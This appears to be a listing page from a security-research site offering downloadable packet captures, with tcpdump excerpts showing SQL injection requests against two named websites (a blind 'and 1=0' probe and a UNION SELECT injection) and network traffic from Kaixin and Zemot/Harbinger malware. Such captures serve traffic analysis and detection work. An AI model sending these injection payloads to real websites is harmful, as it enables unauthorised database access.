Cyber Security Trends in 2016 – Denial of Service and Webshells on the rise

According to several security research firms, 2015 saw a massive decline in the number of reported malware infections, a decline in exploit activity of 84% compared to that of 2013. The few active exploit kits worth noting were Angler, Neutrino and Rig, but besides those three there were virtually no other major campaigns detected in…


Active Business Directory v2 Remote Blind SQL Injection Attack Exploit Traffic PCAP

Download Active Business Directory Remote Blind SQL Injection PCAP: remoteblindsql.pcap

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8…


Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP: stickersqli

2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
.. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
Host: www.musicza.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset:…


Kaixin Malware Trojan Traffic Analysis Download PCAP Sample

Download Kaixin PCAP Sample: kaixin.pcap

2015-01-02 19:50:37.708348 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [S], seq 75942973, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@………w……P…=….p…f………..
2015-01-02 19:50:37.882144 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [S.], seq 954914802, ack 75942974, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0X\..o…w……..P..8……>p.@..y……….
2015-01-02 19:50:37.882622 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [.], ack 1, win…


Zemot/Harbinger Rootkit Trojan Downloader Loads Kuluoz/Asprox Malware PCAP Traffic Sample

Download Zemot/Harbinger Kuluoz Trojan Downloader PCAP: zemot.pcap

E..(..@….A…..wi..t.P…… .P….=……..
2014-08-15 09:11:05.358087 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [P.], seq 1:294, ack 1, win 64240, length 293: HTTP: GET /b/shoe/749634 HTTP/1.1
E..M..@……….wi..t.P…… .P…….GET /b/shoe/749634 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152;…
